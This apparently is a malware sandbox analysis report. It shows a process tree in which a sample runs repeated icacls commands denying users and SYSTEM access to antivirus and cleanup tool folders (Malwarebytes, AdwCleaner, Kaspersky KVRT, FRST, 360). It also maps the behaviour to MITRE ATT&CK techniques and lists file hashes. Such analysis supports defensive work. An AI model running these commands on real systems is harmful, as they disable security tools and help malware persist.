C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:4564
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:2740
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:3420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:1744
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:2068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:1400
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:4812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:4376
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:3684
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:4676
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:5088
-
C:\Windows\system32\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵PID:3596
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:2116
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:68
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny %username%:(OI)(CI)(F)3⤵PID:1788
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵PID:5012
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny %username%:(OI)(CI)(F)3⤵PID:4568
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)3⤵PID:5052
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:2876
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:4868
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4688
-
-
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵PID:4772
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" LanguagePackInstaller1⤵PID:1460
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
1Hidden Users
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
35.3MB
MD5911a11639a40d412466ac9bfca7c1ea1
SHA1bd79203199a3aa9b4222a80bfe070902c50089b9
SHA25691303120d9f0da0918f412b1a50134fe780835457b18624013e7502b6171e6dd
SHA51220a0f6faab8619456dfb8cf5397951a56ea1bff4a3388029a7d19e88b4883cdf2635dcc9c2b71018c1edf1755546924761fd9eb11405fdcb54379c96ec380bdf
-
Filesize
41.0MB
MD5fb480c32023d05d54f48c3782b28026c
SHA124a290da0a96d0d311729a4e58a51ef9342be9af
SHA256a2984435e72316211056bb2ca444312a2c4fe09c0a904e63ca881d9ab026838b
SHA51245991d2ead79396b9a76cffa7d0917671e39317b3ccb73084bc12a3d742730f970ea96ace410da37d397ca5612debd5fc335c5458a449737a468ba3cfaf58312
-
Filesize
7.1MB
MD5a53aad9148d0b6697e1ba2a8b5a095d1
SHA1af28d7609e183571de45064d22af05637fe945a8
SHA256a4f2c71f97cb21679ea323a184c2a7f5b528ecbfcdeaf62f866422bf69eb038c
SHA512a2418f2ee0efa1eca66335be818ede911a7f765032f295884036fedfc5756bb4b10d34dfbc8439f30d3e38b8cd3c6debaa24c940aed6a1d9f8a3d298ab630cab
-
Filesize
5.3MB
MD5dadef5f5098a82ba41c7647020aaabfd
SHA1de27ea9b45e4b36815574587fcb94cba6002115a
SHA25680a027ac2189d5a129998341fb4bd097936b7f76240f75fd8c5d4d197dfaee48
SHA512b25f7819ed83b45ad1710e5c30ad99e9d932db3a677388b10f5509021d945c6caf4af4db7c97320fecbc5a5cee967b219c123a1e8cb033053fc1ac0cb599febb
-
Filesize
23.3MB
MD552b38e93ef4e9978f49ec43566752a81
SHA1436c08225acbae7af8319d0da5c1a8c8728c212b
SHA2565e93706262c7c45acb57916c084ef350ad0823d73f7db14f4f8586c7e51b9de7
SHA51215e954c05b39d5c1552a2d23ba7894f2fbb2e81a2c490ae42eadae4cd44f5f1591a351972b5b496ca724fc63c3bb686b13bbb7e023f0b76fd975c3a8cb404208
-
Filesize
6.1MB
MD5cc882156a745166f5281f6003d3a0569
SHA10730b9a48405867b5b7581055dff4b903297208c
SHA2568fb0655c340416950b3fd778e593a75fb722d1bb23107f608994d430458581a8
SHA5127483807764922b0d0224a4c42066547ac46b528b94c833a5ff43bb78ef9ca42b3267eab1895b205c6f6f09353772feb371d641c2466fb2b63ef9292e739756ab
-
Filesize
11.1MB
MD53a19139573098542a334b615a283789c
SHA11e662151d5ae53cc94b3f7f67d54ec1c21985a48
SHA256c53c9b2704e88c0dcc140ae1efbf98861ff52187476a225a7152b7dc17f11872
SHA5122dc7ba224d70e209a0e7e0baf3c4306ed263dbbfcefc32879cad0100610150501b202e2b4a14160a2275371fd665a3ee974383417b238e5932766dbda70da605
-
Filesize
2KB
MD5483fc2e7373a9ee36cc444fca67a32a8
SHA1c2fe2355683b670622a8e00784bec5056291e494
SHA2562ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d
SHA512e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
3KB
MD5bda88b17bb4de9547f2b31e040ccd620
SHA186d3445684b93cf04cdf01a5753318af952597be
SHA256661b7960192042af7b9039a95f9a522822ea045cf60ff6451079931186b20703
SHA5128a37b07d684c7869a22e1021599ff828c5044b4caf4f1c481cfb56d6f64f3949a7c8ff8bf8a9e536d24ff4bf8766bdbdf1845833eac4a235425f6a549d6c691b
-
Filesize
73B
MD5a7156985a69a520857d07818b2161bec
SHA14ca34541f48f4811aaba2a49d63a7b76bf7ba05e
SHA256bb4810e0f1e95012705f20e78fdc63a57917a9f3d848520e4f3f2a7975dbdbe9
SHA5125a46596f08a32b246573e24896b1407d4b747eef9722a45be20084d50939cf2d9417793e3a83e7edd91587cfbda1074a9ea7539a73b6f991b233210ca638247b
-
Filesize
2KB
MD532b30460e1be0e1dd1a71174285146d5
SHA173ce9d03834d77aee3d56a300fb04ba9706a7f0c
SHA2567d9eb1a729b3aefc0bfc134381099694834225fd4968e202304c1305c1607ecc
SHA512bd36d4f9b0078699f3df09aa45746ceb66147b8f55b4397fbea9f91cf23eb41138fd1f70b1498dfddd7b33db7e07a57c579762738df9d335d13e6df27098af72
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
429KB
MD5c0d60d66e1e21c82875b5538ee35986e
SHA15c5c54a54cb07692bcb1ef037fce27a12bad8194
SHA2560465c6f2c9fc25f816f3a095bc756861ac702af5a48c0ad35a50ea9709ca89c0
SHA5128570fcb6b36ee9ff23164cb1d615faa5522d99d68da05ecb27ea0652cad9ded3382e5daf7c38917ee2ca7cddc7146858db1eaeb053dd4b7ed9da7575ea8f8554